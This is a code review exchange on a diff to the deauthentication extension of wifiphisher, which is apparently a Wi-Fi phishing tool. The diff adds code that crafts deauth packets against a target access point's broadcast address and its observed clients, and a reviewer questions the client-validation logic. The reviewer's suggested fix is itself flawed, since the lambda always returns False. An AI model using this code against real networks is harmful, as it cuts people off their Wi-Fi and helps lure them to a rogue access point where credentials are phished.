wifiphisher/extensions/deauth.py

```diff
@@ -88,101 +63,130 @@ def get_packet(self, packet):
-        return (channels, self.packets_to_send)
+        channels = list()
+        packets_to_send = list()
+
+        # when --essid is used we don't have target_ap_bssid
+        if self._data.target_ap_bssid:
+            # we need to create this packet only once
+            if self._first_run:
+                # Craft and add deauth/disas packet to broadcast address
+                packets_to_send += self._craft_packet(self._data.target_ap_bssid,
+                                                      constants.WIFI_BROADCAST,
+                                                      self._data.target_ap_bssid)
+                self._first_run = False
+
+            bssid = self._data.target_ap_bssid
+            channels.append(self._data.target_ap_channel)
+            self._channels.append(self._data.target_ap_channel)
+        else:
+            bssid = packet.addr3
+
+            # Do not send deauth for our rogue access point
+            if bssid == self._data.rogue_ap_mac:
+                return ([], [])
+
+            # obtain the channel for this packet
+            try:
+                # channel is in the third IE of Dot11Elt
+                channel = ord(packet[dot11.Dot11Elt][2].info)
+
+                # check if this is valid channel
+                if channel not in constants.ALL_2G_CHANNELS:
+                    return ([], [])
+
+                channels.append(str(channel))
+                self._channels.append(str(channel))
+            except (TypeError, IndexError):
+                # just return empty channel and packet
+                return ([], [])
+
+        # extract sender and receiver and check if it's a client
+        receiver = packet.addr1
+        sender = packet.addr2
+        clients = self._add_clients(sender, receiver, bssid)
+
+        if clients:
+            self._observed_clients.append(clients[0])
+            packets_to_send += clients[1]
+
+        return (channels, packets_to_send)
+
+    def _add_clients(self, sender, receiver, bssid):
+        """
+        Craft and add deauthentication packets based on the sender/receiver
+        to the database
+
+        :param self: A Deauth object
+        :param sender: Address of the sender
+        :param receiver: Address of the receiver
+        :param bssid: Address of the bssid
+        :type self: Deauth
+        :type sender: str
+        :type receiver: str
+        :type bssid: str
+        :return: None
+        :rtype: None
+        """
+
+        # list of addresses that are not acceptable
+        non_valid_list = constants.NON_CLIENT_ADDRESSES + self._observed_clients
+
+        # function for passing values
+        pass_fun = lambda s: s
+
+        # check if the sender/receiver is valid
+        is_valid = lambda x: ((x in non_valid_list and pass_fun(False)) or
+                              (x == bssid and pass_fun(True)) or
+                              (pass_fun(False)))
+
```

Comment:
The `is_valid` function's logic seems not correct for me. Why `x==bssid` implies this frame is an valid frame?

* If sender is valid, you will return (receiver, packets()), now if sender == BSSID, that means receiver is client, what if client is in `non_valid_list`?

* `is_valid` should check if client is in `non_valid_list`. We need to pick one of sender or receiver that is not equal to BSSID. The logic would be like the following:
```python
if sender == bssid:
    client = receiver
elif receiver == bssid:
    client = sender
is_valid = lambda x: ((x in non_valid_list and pass_fun(False)) or
                                   (pass_fun(False)))
return (is_valid(client) and (client, packets) or None)
```